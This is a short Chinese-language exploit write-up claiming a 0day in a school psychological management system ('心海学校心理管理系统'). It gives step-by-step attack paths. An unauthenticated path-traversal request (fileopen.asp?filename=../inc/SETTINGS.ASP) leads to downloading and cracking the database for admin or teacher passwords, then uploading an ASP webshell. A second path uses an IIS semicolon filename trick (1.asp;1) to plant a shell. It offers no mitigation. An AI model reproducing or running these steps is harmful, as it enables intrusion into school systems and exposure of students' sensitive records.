漏洞名称:心海学校心理管理系统0day by:shady

漏洞描述:admin/fileopen.asp没有验证是否登录

利用方法:
一:
admin/fileopen.asp?filename=../inc/SETTINGS.ASP

用记事本打开下载下的文件,得到数据库地址,

继续用fileopen.asp?filename=数据库相对地址,

下载后用access密码破解软件破解密码,

得到管理员或老师的账号密码,登陆后,

在admin/update.asp直接上传asp得到shell

二:
inc/upload.asp?fl=1.asp;1 上传图片格式的asp马,得到Shell